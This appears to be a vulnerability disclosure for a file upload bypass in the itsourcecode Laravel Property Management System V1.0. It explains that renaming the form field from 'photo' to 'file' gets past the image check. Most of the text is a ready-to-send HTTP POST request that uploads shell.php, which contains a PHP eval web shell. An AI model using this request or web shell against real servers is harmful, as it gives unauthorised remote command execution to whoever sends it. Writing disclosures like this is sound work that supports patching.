itsourcecode
Laravel Property Management System
V1.0
https://itsourcecode.com/wp-content/uploads/2021/10/Property-Management-System-Laravel.zip
FileUpload
In the PropertiesController.php controller, the upload method is used to upload images. However, since the image detection rules in the UpdatePropertiesRequest class can be bypassed, attackers can directly upload Webshell files.
- Visit the backend "/admin/properties/create" location to upload pictures. The uploaded pictures will be handled by the update method of the app/Http/Controllers/Admin/PropertiesController.php controller.
- In the upload method, the detection rule is located in the rule() method of the UpdatePropertiesRequest class. The photo file type passed in by the user must be a picture. This rule is fine. The problem is that the attacker can modify the photo to any name when uploading the file, because the saveFiles() method does not read the file content in the specified parameter, but traverses it through the "($request->hasFile($key))" method.
Note that in the form-data position, name="photo" is changed to name="file"
POST /admin/properties HTTP/1.1
Host: <host:port>
Content-Length: 862
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.17.22:8000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5jIWWI3hIJsIxXKJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.17.22:8000/admin/properties/create
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: <change cookies>
Connection: close
------WebKitFormBoundary5jIWWI3hIJsIxXKJ
Content-Disposition: form-data; name="_token"
XabMXjldHui8xdksPHFAvs6FdhR8vPvdZyVMMnpx
------WebKitFormBoundary5jIWWI3hIJsIxXKJ
Content-Disposition: form-data; name="name"
mirage
------WebKitFormBoundary5jIWWI3hIJsIxXKJ
Content-Disposition: form-data; name="address"
aaaa
------WebKitFormBoundary5jIWWI3hIJsIxXKJ
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/png
GIF89a
<?php eval($_POST["cmd"]);?>
------WebKitFormBoundary5jIWWI3hIJsIxXKJ
Content-Disposition: form-data; name="photo_max_size"
2
------WebKitFormBoundary5jIWWI3hIJsIxXKJ
Content-Disposition: form-data; name="photo_max_width"
4096
------WebKitFormBoundary5jIWWI3hIJsIxXKJ
Content-Disposition: form-data; name="photo_max_height"
4096
------WebKitFormBoundary5jIWWI3hIJsIxXKJ--